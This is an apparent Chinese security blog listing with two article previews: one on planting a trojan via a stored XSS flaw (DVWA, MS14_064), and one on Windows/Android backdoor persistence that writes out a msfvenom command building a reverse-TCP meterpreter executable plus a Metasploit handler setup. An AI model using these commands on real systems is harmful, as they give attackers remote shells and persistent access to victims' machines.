安全
文章平均质量分 55
bingxinid
bingxinid
展开
-
XSS漏洞,通过XSS实现网页挂马
首先我们的目标是一个存在存储型 XSS 漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA 平台上就有专门给我们练习存储型 XSS 漏洞的页面,我们就通过这个网页来实践挂马。2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。原创 2023-02-11 18:36:36 · 2174 阅读 · 1 评论 -
windows/android后门的维持
搭建环境:kali linux,MSFwindons后门维持// 先创建一个后门payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe// 打开msf控制台,并完成相关设置msfconsoleuse exploit/multi/handlerset payload windows/meterpr原创 2021-08-09 22:39:24 · 585 阅读 · 0 评论